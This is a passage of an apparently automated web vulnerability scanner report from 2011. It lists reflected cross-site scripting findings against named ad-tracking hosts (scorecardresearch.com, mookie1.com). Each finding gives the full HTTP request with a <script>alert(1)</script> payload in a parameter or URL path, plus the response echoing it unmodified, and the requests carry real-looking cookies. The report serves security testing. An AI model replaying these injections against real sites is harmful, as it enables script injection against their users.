MSCORE.purge=function(a){try{var c=[],f,b;a=a||_comscore;for(b=a.length-1;b>=0;b--){f=COMSCORE.beacon(a[b]);a.splice(b,1);if(f){c.push(f)}}return c}catch(d){}};COMSCORE.purge();
COMSCORE.beacon({c1:"8c534e<script>alert(1)</script>d15bf7170c1", c2:"6135404", c3:"15", c4:"12005", c5:"", c6:"", c10:"3212813", c15:"", c16:"", r:""});

1.56. http://b.scorecardresearch.com/beacon.js [c10 parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://b.scorecardresearch.com
Path:   /beacon.js

Issue detail

The value of the c10 request parameter is copied into the HTML document as plain text between tags. The payload 75841<script>alert(1)</script>a90132d1976 was submitted in the c10 parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /beacon.js?c1=8&c2=6135404&c3=15&c4=12005&c5=&c6=&c10=321281375841<script>alert(1)</script>a90132d1976&c15= HTTP/1.1
Host: b.scorecardresearch.com
Proxy-Connection: keep-alive
Referer: http://optimized-by.rubiconproject.com/a/7469/12005/20615-9.html?
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.107 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: UID=6d0f24-24.143.206.42-1297806131

Response

HTTP/1.1 200 OK
Content-Type: application/x-javascript
Vary: Accept-Encoding
Cache-Control: private, no-transform, max-age=604800
Expires: Mon, 14 Mar 2011 01:47:09 GMT
Date: Mon, 07 Mar 2011 01:47:09 GMT
Connection: close
Content-Length: 3594

if(typeof COMSCORE=="undefined"){window.COMSCORE={}}if(typeof COMSCORE.Beacon=="undefined"){COMSCORE.Beacon={}}if(typeof _comscore!="object"){window._comscore=[]}COMSCORE.beacon=function(j){try{if(!j)
...[SNIP]...
.length-1;b>=0;b--){f=COMSCORE.beacon(a[b]);a.splice(b,1);if(f){c.push(f)}}return c}catch(d){}};COMSCORE.purge();
COMSCORE.beacon({c1:"8", c2:"6135404", c3:"15", c4:"12005", c5:"", c6:"", c10:"321281375841<script>alert(1)</script>a90132d1976", c15:"", c16:"", r:""});

1.57. http://b.scorecardresearch.com/beacon.js [c15 parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://b.scorecardresearch.com
Path:   /beacon.js

Issue detail

The value of the c15 request parameter is copied into the HTML document as plain text between tags. The payload beb29<script>alert(1)</script>35101d2c181 was submitted in the c15 parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /beacon.js?c1=8&c2=6135404&c3=15&c4=12005&c5=&c6=&c10=3212813&c15=beb29<script>alert(1)</script>35101d2c181 HTTP/1.1
Host: b.scorecardresearch.com
Proxy-Connection: keep-alive
Referer: http://optimized-by.rubiconproject.com/a/7469/12005/20615-9.html?
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.107 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: UID=6d0f24-24.143.206.42-1297806131

Response

HTTP/1.1 200 OK
Content-Type: application/x-javascript
Vary: Accept-Encoding
Cache-Control: private, no-transform, max-age=604800
Expires: Mon, 14 Mar 2011 01:47:10 GMT
Date: Mon, 07 Mar 2011 01:47:10 GMT
Connection: close
Content-Length: 3594

if(typeof COMSCORE=="undefined"){window.COMSCORE={}}if(typeof COMSCORE.Beacon=="undefined"){COMSCORE.Beacon={}}if(typeof _comscore!="object"){window._comscore=[]}COMSCORE.beacon=function(j){try{if(!j)
...[SNIP]...
1;b>=0;b--){f=COMSCORE.beacon(a[b]);a.splice(b,1);if(f){c.push(f)}}return c}catch(d){}};COMSCORE.purge();
COMSCORE.beacon({c1:"8", c2:"6135404", c3:"15", c4:"12005", c5:"", c6:"", c10:"3212813", c15:"beb29<script>alert(1)</script>35101d2c181", c16:"", r:""});

1.58. http://b.scorecardresearch.com/beacon.js [c2 parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://b.scorecardresearch.com
Path:   /beacon.js

Issue detail

The value of the c2 request parameter is copied into the HTML document as plain text between tags. The payload fdeb6<script>alert(1)</script>18adce1c522 was submitted in the c2 parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /beacon.js?c1=8&c2=6135404fdeb6<script>alert(1)</script>18adce1c522&c3=15&c4=12005&c5=&c6=&c10=3212813&c15= HTTP/1.1
Host: b.scorecardresearch.com
Proxy-Connection: keep-alive
Referer: http://optimized-by.rubiconproject.com/a/7469/12005/20615-9.html?
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.107 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: UID=6d0f24-24.143.206.42-1297806131

Response

HTTP/1.1 200 OK
Content-Type: application/x-javascript
Vary: Accept-Encoding
Cache-Control: private, no-transform, max-age=604800
Expires: Mon, 14 Mar 2011 01:47:04 GMT
Date: Mon, 07 Mar 2011 01:47:04 GMT
Connection: close
Content-Length: 3594

if(typeof COMSCORE=="undefined"){window.COMSCORE={}}if(typeof COMSCORE.Beacon=="undefined"){COMSCORE.Beacon={}}if(typeof _comscore!="object"){window._comscore=[]}COMSCORE.beacon=function(j){try{if(!j)
...[SNIP]...
unction(a){try{var c=[],f,b;a=a||_comscore;for(b=a.length-1;b>=0;b--){f=COMSCORE.beacon(a[b]);a.splice(b,1);if(f){c.push(f)}}return c}catch(d){}};COMSCORE.purge();
COMSCORE.beacon({c1:"8", c2:"6135404fdeb6<script>alert(1)</script>18adce1c522", c3:"15", c4:"12005", c5:"", c6:"", c10:"3212813", c15:"", c16:"", r:""});

1.59. http://b.scorecardresearch.com/beacon.js [c3 parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://b.scorecardresearch.com
Path:   /beacon.js

Issue detail

The value of the c3 request parameter is copied into the HTML document as plain text between tags. The payload 99c56<script>alert(1)</script>ef484687d18 was submitted in the c3 parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /beacon.js?c1=8&c2=6135404&c3=1599c56<script>alert(1)</script>ef484687d18&c4=12005&c5=&c6=&c10=3212813&c15= HTTP/1.1
Host: b.scorecardresearch.com
Proxy-Connection: keep-alive
Referer: http://optimized-by.rubiconproject.com/a/7469/12005/20615-9.html?
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.107 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: UID=6d0f24-24.143.206.42-1297806131

Response

HTTP/1.1 200 OK
Content-Type: application/x-javascript
Vary: Accept-Encoding
Cache-Control: private, no-transform, max-age=604800
Expires: Mon, 14 Mar 2011 01:47:05 GMT
Date: Mon, 07 Mar 2011 01:47:05 GMT
Connection: close
Content-Length: 3594

if(typeof COMSCORE=="undefined"){window.COMSCORE={}}if(typeof COMSCORE.Beacon=="undefined"){COMSCORE.Beacon={}}if(typeof _comscore!="object"){window._comscore=[]}COMSCORE.beacon=function(j){try{if(!j)
...[SNIP]...
){try{var c=[],f,b;a=a||_comscore;for(b=a.length-1;b>=0;b--){f=COMSCORE.beacon(a[b]);a.splice(b,1);if(f){c.push(f)}}return c}catch(d){}};COMSCORE.purge();
COMSCORE.beacon({c1:"8", c2:"6135404", c3:"1599c56<script>alert(1)</script>ef484687d18", c4:"12005", c5:"", c6:"", c10:"3212813", c15:"", c16:"", r:""});

1.60. http://b.scorecardresearch.com/beacon.js [c4 parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://b.scorecardresearch.com
Path:   /beacon.js

Issue detail

The value of the c4 request parameter is copied into the HTML document as plain text between tags. The payload 919e4<script>alert(1)</script>921de2591d1 was submitted in the c4 parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /beacon.js?c1=8&c2=6135404&c3=15&c4=12005919e4<script>alert(1)</script>921de2591d1&c5=&c6=&c10=3212813&c15= HTTP/1.1
Host: b.scorecardresearch.com
Proxy-Connection: keep-alive
Referer: http://optimized-by.rubiconproject.com/a/7469/12005/20615-9.html?
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.107 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: UID=6d0f24-24.143.206.42-1297806131

Response

HTTP/1.1 200 OK
Content-Type: application/x-javascript
Vary: Accept-Encoding
Cache-Control: private, no-transform, max-age=604800
Expires: Mon, 14 Mar 2011 01:47:06 GMT
Date: Mon, 07 Mar 2011 01:47:06 GMT
Connection: close
Content-Length: 3594

if(typeof COMSCORE=="undefined"){window.COMSCORE={}}if(typeof COMSCORE.Beacon=="undefined"){COMSCORE.Beacon={}}if(typeof _comscore!="object"){window._comscore=[]}COMSCORE.beacon=function(j){try{if(!j)
...[SNIP]...
[],f,b;a=a||_comscore;for(b=a.length-1;b>=0;b--){f=COMSCORE.beacon(a[b]);a.splice(b,1);if(f){c.push(f)}}return c}catch(d){}};COMSCORE.purge();
COMSCORE.beacon({c1:"8", c2:"6135404", c3:"15", c4:"12005919e4<script>alert(1)</script>921de2591d1", c5:"", c6:"", c10:"3212813", c15:"", c16:"", r:""});

1.61. http://b.scorecardresearch.com/beacon.js [c5 parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://b.scorecardresearch.com
Path:   /beacon.js

Issue detail

The value of the c5 request parameter is copied into the HTML document as plain text between tags. The payload ba08c<script>alert(1)</script>3eeb0c57d13 was submitted in the c5 parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /beacon.js?c1=8&c2=6135404&c3=15&c4=12005&c5=ba08c<script>alert(1)</script>3eeb0c57d13&c6=&c10=3212813&c15= HTTP/1.1
Host: b.scorecardresearch.com
Proxy-Connection: keep-alive
Referer: http://optimized-by.rubiconproject.com/a/7469/12005/20615-9.html?
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.107 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: UID=6d0f24-24.143.206.42-1297806131

Response

HTTP/1.1 200 OK
Content-Type: application/x-javascript
Vary: Accept-Encoding
Cache-Control: private, no-transform, max-age=604800
Expires: Mon, 14 Mar 2011 01:47:07 GMT
Date: Mon, 07 Mar 2011 01:47:07 GMT
Connection: close
Content-Length: 3594

if(typeof COMSCORE=="undefined"){window.COMSCORE={}}if(typeof COMSCORE.Beacon=="undefined"){COMSCORE.Beacon={}}if(typeof _comscore!="object"){window._comscore=[]}COMSCORE.beacon=function(j){try{if(!j)
...[SNIP]...
a=a||_comscore;for(b=a.length-1;b>=0;b--){f=COMSCORE.beacon(a[b]);a.splice(b,1);if(f){c.push(f)}}return c}catch(d){}};COMSCORE.purge();
COMSCORE.beacon({c1:"8", c2:"6135404", c3:"15", c4:"12005", c5:"ba08c<script>alert(1)</script>3eeb0c57d13", c6:"", c10:"3212813", c15:"", c16:"", r:""});

1.62. http://b.scorecardresearch.com/beacon.js [c6 parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://b.scorecardresearch.com
Path:   /beacon.js

Issue detail

The value of the c6 request parameter is copied into the HTML document as plain text between tags. The payload ed75e<script>alert(1)</script>15cdaeb4955 was submitted in the c6 parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /beacon.js?c1=8&c2=6135404&c3=15&c4=12005&c5=&c6=ed75e<script>alert(1)</script>15cdaeb4955&c10=3212813&c15= HTTP/1.1
Host: b.scorecardresearch.com
Proxy-Connection: keep-alive
Referer: http://optimized-by.rubiconproject.com/a/7469/12005/20615-9.html?
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.107 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: UID=6d0f24-24.143.206.42-1297806131

Response

HTTP/1.1 200 OK
Content-Type: application/x-javascript
Vary: Accept-Encoding
Cache-Control: private, no-transform, max-age=604800
Expires: Mon, 14 Mar 2011 01:47:08 GMT
Date: Mon, 07 Mar 2011 01:47:08 GMT
Connection: close
Content-Length: 3594

if(typeof COMSCORE=="undefined"){window.COMSCORE={}}if(typeof COMSCORE.Beacon=="undefined"){COMSCORE.Beacon={}}if(typeof _comscore!="object"){window._comscore=[]}COMSCORE.beacon=function(j){try{if(!j)
...[SNIP]...
omscore;for(b=a.length-1;b>=0;b--){f=COMSCORE.beacon(a[b]);a.splice(b,1);if(f){c.push(f)}}return c}catch(d){}};COMSCORE.purge();
COMSCORE.beacon({c1:"8", c2:"6135404", c3:"15", c4:"12005", c5:"", c6:"ed75e<script>alert(1)</script>15cdaeb4955", c10:"3212813", c15:"", c16:"", r:""});

1.63. http://b3.mookie1.com/2/IIIInteractiveB3/ATTW/1H_11Q1/ROSIP/160/11299460716704@x90 [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://b3.mookie1.com
Path:   /2/IIIInteractiveB3/ATTW/1H_11Q1/ROSIP/160/11299460716704@x90

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 13f03"><script>alert(1)</script>26e9f608a62 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /2/IIIInteractiveB313f03"><script>alert(1)</script>26e9f608a62/ATTW/1H_11Q1/ROSIP/160/11299460716704@x90 HTTP/1.1
Host: b3.mookie1.com
Proxy-Connection: keep-alive
Referer: http://c5.zedo.com/jsc/c5/ff2.html?n=305;c=5623/387/1;s=256;d=7;w=160;h=600
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.107 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: OAX=rcHW801b0RcADNFE; ATTW=TrafficMarketplaceB3; ATTWired=ZapTrader; NXCLICK2=011Pu357NX_TRACK_Radioshack/Magnetic/DYN2011Q1/M_COM/1x1/1[timestamp]!y!B3!CWN!EUV; RMFL=011Pu357U107OI; RMFM=011PvfB8Q10CWN|U10Dil|E10Dzy; ATT=UndertoneB3; other_20110126=set; dlx_XXX=set; Dominos=247B3; id=3375925924; session=1299459588|1299459588; NSC_o4efm_qppm_iuuq=ffffffff09499e2145525d5f4f58455e445a4a423660; Dell=MaxpointB3

Response

HTTP/1.1 200 OK
Date: Mon, 07 Mar 2011 01:47:26 GMT
Server: Apache/2.0.52 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Content-Length: 359
Content-Type: text/html
Set-Cookie: NSC_o4efm_qppm_iuuq=ffffffff09419e5545525d5f4f58455e445a4a423660;path=/

<A HREF="http://b3.mookie1.com/RealMedia/ads/click_lx.ads/IIIInteractiveB313f03"><script>alert(1)</script>26e9f608a62/ATTW/1H_11Q1/ROSIP/160/1549359825/x90/default/empty.gif/726348573830316230526341444e4645?x" target="_top">
...[SNIP]...

1.64. http://b3.mookie1.com/2/IIIInteractiveB3/ATTW/1H_11Q1/ROSIP/160/11299460716704@x90 [REST URL parameter 3]

Summary

Severity:   High
Confidence:   Certain
Host:   http://b3.mookie1.com
Path:   /2/IIIInteractiveB3/ATTW/1H_11Q1/ROSIP/160/11299460716704@x90

Issue detail

The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 89066"><script>alert(1)</script>3bb9319201a was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /2/IIIInteractiveB3/ATTW89066"><script>alert(1)</script>3bb9319201a/1H_11Q1/ROSIP/160/11299460716704@x90 HTTP/1.1
Host: b3.mookie1.com
Proxy-Connection: keep-alive
Referer: http://c5.zedo.com/jsc/c5/ff2.html?n=305;c=5623/387/1;s=256;d=7;w=160;h=600
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.107 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: OAX=rcHW801b0RcADNFE; ATTW=TrafficMarketplaceB3; ATTWired=ZapTrader; NXCLICK2=011Pu357NX_TRACK_Radioshack/Magnetic/DYN2011Q1/M_COM/1x1/1[timestamp]!y!B3!CWN!EUV; RMFL=011Pu357U107OI; RMFM=011PvfB8Q10CWN|U10Dil|E10Dzy; ATT=UndertoneB3; other_20110126=set; dlx_XXX=set; Dominos=247B3; id=3375925924; session=1299459588|1299459588; NSC_o4efm_qppm_iuuq=ffffffff09499e2145525d5f4f58455e445a4a423660; Dell=MaxpointB3

Response

HTTP/1.1 200 OK
Date: Mon, 07 Mar 2011 01:47:53 GMT
Server: Apache/2.2.3 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Content-Length: 359
Content-Type: text/html
Set-Cookie: NSC_o4efm_qppm_iuuq=ffffffff09419e2845525d5f4f58455e445a4a423660;path=/

<A HREF="http://b3.mookie1.com/RealMedia/ads/click_lx.ads/IIIInteractiveB3/ATTW89066"><script>alert(1)</script>3bb9319201a/1H_11Q1/ROSIP/160/2117324463/x90/default/empty.gif/726348573830316230526341444e4645?x" target="_top">
...[SNIP]...

1.65. http://b3.mookie1.com/2/IIIInteractiveB3/ATTW/1H_11Q1/ROSIP/160/11299460716704@x90 [REST URL parameter 4]

Summary

Severity:   High
Confidence:   Certain
Host:   http://b3.mookie1.com
Path:   /2/IIIInteractiveB3/ATTW/1H_11Q1/ROSIP/160/11299460716704@x90

Issue detail

The value of REST URL parameter 4 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload e846f"><script>alert(1)</script>5513091fadf was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /2/IIIInteractiveB3/ATTW/1H_11Q1e846f"><script>alert(1)</script>5513091fadf/ROSIP/160/11299460716704@x90 HTTP/1.1
Host: b3.mookie1.com
Proxy-Connection: keep-alive
Referer: http://c5.zedo.com/jsc/c5/ff2.html?n=305;c=5623/387/1;s=256;d=7;w=160;h=600
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.107 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: OAX=rcHW801b0RcADNFE; ATTW=TrafficMarketplaceB3; ATTWired=ZapTrader; NXCLICK2=011Pu357NX_TRACK_Radioshack/Magnetic/DYN2011Q1/M_COM/1x1/1[timestamp]!y!B3!CWN!EUV; RMFL=011Pu357U107OI; RMFM=011PvfB8Q10CWN|U10Dil|E10Dzy; ATT=UndertoneB3; other_20110126=set; dlx_XXX=set; Dominos=247B3; id=3375925924; session=1299459588|1299459588; NSC_o4efm_qppm_iuuq=ffffffff09499e2145525d5f4f58455e445a4a423660; Dell=MaxpointB3

Response

HTTP/1.1 200 OK
Date: Mon, 07 Mar 2011 01:48:20 GMT
Server: Apache/2.0.52 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Content-Length: 359
Content-Type: text/html
Set-Cookie: NSC_o4efm_qppm_iuuq=ffffffff09419e9345525d5f4f58455e445a4a423660;path=/

<A HREF="http://b3.mookie1.com/RealMedia/ads/click_lx.ads/IIIInteractiveB3/ATTW/1H_11Q1e846f"><script>alert(1)</script>5513091fadf/ROSIP/160/2140031721/x90/default/empty.gif/726348573830316230526341444e4645?x" target="_top">
...[SNIP]...

1.66. http://b3.mookie1.com/2/IIIInteractiveB3/ATTW/1H_11Q1/ROSIP/160/11299460716704@x90 [REST URL parameter 5]

Summary

Severity:   High
Confidence:   Certain
Host:   http://b3.mookie1.com
Path:   /2/IIIInteractiveB3/ATTW/1H_11Q1/ROSIP/160/11299460716704@x90

Issue detail

The value of REST URL parameter 5 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 7aca2"><script>alert(1)</script>a396d432942 was submitted in the REST URL parameter 5. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /2/IIIInteractiveB3/ATTW/1H_11Q1/ROSIP7aca2"><script>alert(1)</script>a396d432942/160/11299460716704@x90 HTTP/1.1
Host: b3.mookie1.com
Proxy-Connection: keep-alive
Referer: http://c5.zedo.com/jsc/c5/ff2.html?n=305;c=5623/387/1;s=256;d=7;w=160;h=600
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.107 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: OAX=rcHW801b0RcADNFE; ATTW=TrafficMarketplaceB3; ATTWired=ZapTrader; NXCLICK2=011Pu357NX_TRACK_Radioshack/Magnetic/DYN2011Q1/M_COM/1x1/1[timestamp]!y!B3!CWN!EUV; RMFL=011Pu357U107OI; RMFM=011PvfB8Q10CWN|U10Dil|E10Dzy; ATT=UndertoneB3; other_20110126=set; dlx_XXX=set; Dominos=247B3; id=3375925924; session=1299459588|1299459588; NSC_o4efm_qppm_iuuq=ffffffff09499e2145525d5f4f58455e445a4a423660; Dell=MaxpointB3

Response

HTTP/1.1 200 OK
Date: Mon, 07 Mar 2011 01:48:43 GMT
Server: Apache/2.0.52 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Content-Length: 359
Content-Type: text/html
Set-Cookie: NSC_o4efm_qppm_iuuq=ffffffff09419e5145525d5f4f58455e445a4a423660;path=/

<A HREF="http://b3.mookie1.com/RealMedia/ads/click_lx.ads/IIIInteractiveB3/ATTW/1H_11Q1/ROSIP7aca2"><script>alert(1)</script>a396d432942/160/1921842916/x90/default/empty.gif/726348573830316230526341444e4645?x" target="_top">
...[SNIP]...

1.67. http://b3.mookie1.com/2/IIIInteractiveB3/ATTW/1H_11Q1/ROSIP/160/11299460716704@x90 [REST URL parameter 6]

Summary

Severity:   High
Confidence:   Certain
Host:   http://b3.mookie1.com
Path:   /2/IIIInteractiveB3/ATTW/1H_11Q1/ROSIP/160/11299460716704@x90

Issue detail

The value of REST URL parameter 6 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload da961"><script>alert(1)</script>aa909b82e8f was submitted in the REST URL parameter 6. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /2/IIIInteractiveB3/ATTW/1H_11Q1/ROSIP/160da961"><script>alert(1)</script>aa909b82e8f/11299460716704@x90 HTTP/1.1
Host: b3.mookie1.com
Proxy-Connection: keep-alive
Referer: http://c5.zedo.com/jsc/c5/ff2.html?n=305;c=5623/387/1;s=256;d=7;w=160;h=600
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.107 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: OAX=rcHW801b0RcADNFE; ATTW=TrafficMarketplaceB3; ATTWired=ZapTrader; NXCLICK2=011Pu357NX_TRACK_Radioshack/Magnetic/DYN2011Q1/M_COM/1x1/1[timestamp]!y!B3!CWN!EUV; RMFL=011Pu357U107OI; RMFM=011PvfB8Q10CWN|U10Dil|E10Dzy; ATT=UndertoneB3; other_20110126=set; dlx_XXX=set; Dominos=247B3; id=3375925924; session=1299459588|1299459588; NSC_o4efm_qppm_iuuq=ffffffff09499e2145525d5f4f58455e445a4a423660; Dell=MaxpointB3

Response

HTTP/1.1 200 OK
Date: Mon, 07 Mar 2011 01:49:11 GMT
Server: Apache/2.2.3 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Content-Length: 358
Content-Type: text/html
Set-Cookie: NSC_o4efm_qppm_iuuq=ffffffff09419e2845525d5f4f58455e445a4a423660;path=/

<A HREF="http://b3.mookie1.com/RealMedia/ads/click_lx.ads/IIIInteractiveB3/ATTW/1H_11Q1/ROSIP/160da961"><script>alert(1)</script>aa909b82e8f/591197245/x90/default/empty.gif/726348573830316230526341444e4645?x" target="_top">
...[SNIP]...

1.68. http://b3.mookie1.com/2/IIIInteractiveB3/ATTW/1H_11Q1/ROSIP/160/11299460716704@x90 [REST URL parameter 7]

Summary

Severity:   High
Confidence:   Certain
Host:   http://b3.mookie1.com
Path:   /2/IIIInteractiveB3/ATTW/1H_11Q1/ROSIP/160/11299460716704@x90

Issue detail

The value of REST URL parameter 7 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 7c26a"><script>alert(1)</script>210543f7078 was submitted in the REST URL parameter 7. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /2/IIIInteractiveB3/ATTW/1H_11Q1/ROSIP/160/11299460716704@x907c26a"><script>alert(1)</script>210543f7078 HTTP/1.1
Host: b3.mookie1.com
Proxy-Connection: keep-alive
Referer: http://c5.zedo.com/jsc/c5/ff2.html?n=305;c=5623/387/1;s=256;d=7;w=160;h=600
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.107 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: OAX=rcHW801b0RcADNFE; ATTW=TrafficMarketplaceB3; ATTWired=ZapTrader; NXCLICK2=011Pu357NX_TRACK_Radioshack/Magnetic/DYN2011Q1/M_COM/1x1/1[timestamp]!y!B3!CWN!EUV; RMFL=011Pu357U107OI; RMFM=011PvfB8Q10CWN|U10Dil|E10Dzy; ATT=UndertoneB3; other_20110126=set; dlx_XXX=set; Dominos=247B3; id=3375925924; session=1299459588|1299459588; NSC_o4efm_qppm_iuuq=ffffffff09499e2145525d5f4f58455e445a4a423660; Dell=MaxpointB3

Response

HTTP/1.1 200 OK
Date: Mon, 07 Mar 2011 01:49:45 GMT
Server: Apache/2.0.52 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Content-Length: 351
Content-Type: text/html
Set-Cookie: NSC_o4efm_qppm_iuuq=ffffffff09419e5545525d5f4f58455e445a4a423660;path=/

<A HREF="http://b3.mookie1.com/RealMedia/ads/click_lx.ads/IIIInteractiveB3/ATTW/1H_11Q1/ROSIP/160/1127873498/x907c26a"><script>alert(1)</script>210543f7078/default/empty.gif/726348573830316230526341444e4645?x" target="_top">
...[SNIP]...

1.69. http://b3.mookie1.com/2/MaxpointB3/Dell/Streak11Q1/Demo/160/1[timestamp]@x90 [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://b3.mookie1.com
Path:   /2/MaxpointB3/Dell/Streak11Q1/Demo/160/1[timestamp]@x90

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 7c414"><script>alert(1)</script>a626a591c0b was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /2/MaxpointB37c414"><script>alert(1)</script>a626a591c0b/Dell/Streak11Q1/Demo/160/1[timestamp]@x90 HTTP/1.1
Host: b3.mookie1.com
